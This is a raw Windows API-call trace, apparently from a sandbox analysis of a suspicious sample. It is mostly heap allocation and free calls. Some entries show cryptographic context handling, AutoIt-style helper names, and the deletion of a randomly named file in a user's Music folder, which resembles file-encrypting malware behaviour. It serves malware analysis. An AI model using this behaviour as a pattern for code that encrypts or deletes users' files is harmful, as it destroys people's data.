[0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.847] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0117.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0117.860] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0117.860] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0117.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0117.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.861] FreeLibrary (hLibModule=0x756e0000) returned 1 [0117.861] CloseHandle (hObject=0x258) returned 1 [0117.861] CloseHandle (hObject=0x298) returned 1 [0117.863] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\TFaPhwZGXS0zM.wav", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\TFaPhwZGXS0zM.wav", lpFilePart=0x0) returned 0x32 [0117.863] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\TFaPhwZGXS0zM.wav" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b\\tfaphwzgxs0zm.wav")) returned 0x20 [0117.863] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\TFaPhwZGXS0zM.wav", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e1cd10, ftCreationTime.dwHighDateTime=0x1d5ea0e, ftLastAccessTime.dwLowDateTime=0x70eb26c0, ftLastAccessTime.dwHighDateTime=0x1d5e7df, ftLastWriteTime.dwLowDateTime=0x70eb26c0, ftLastWriteTime.dwHighDateTime=0x1d5e7df, nFileSizeHigh=0x0, nFileSizeLow=0x43ef, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="TFaPhwZGXS0zM.wav", cAlternateFileName="TFAPHW~1.WAV")) returned 0x41ac280 [0117.863] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\TFaPhwZGXS0zM.wav" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b\\tfaphwzgxs0zm.wav")) returned 1 [0117.868] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e1cd10, ftCreationTime.dwHighDateTime=0x1d5ea0e, ftLastAccessTime.dwLowDateTime=0x70eb26c0, ftLastAccessTime.dwHighDateTime=0x1d5e7df, ftLastWriteTime.dwLowDateTime=0x70eb26c0, ftLastWriteTime.dwHighDateTime=0x1d5e7df, nFileSizeHigh=0x0, nFileSizeLow=0x43ef, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="TFaPhwZGXS0zM.wav", cAlternateFileName="TFAPHW~1.WAV")) returned 0 [0117.868] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0117.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0117.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0117.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0117.868] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0117.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0117.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0117.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0117.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0117.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0117.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0117.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca118 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0117.869] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0117.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0117.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x42) returned 0x428b768 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0117.872] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b")) returned 0x10 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0117.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 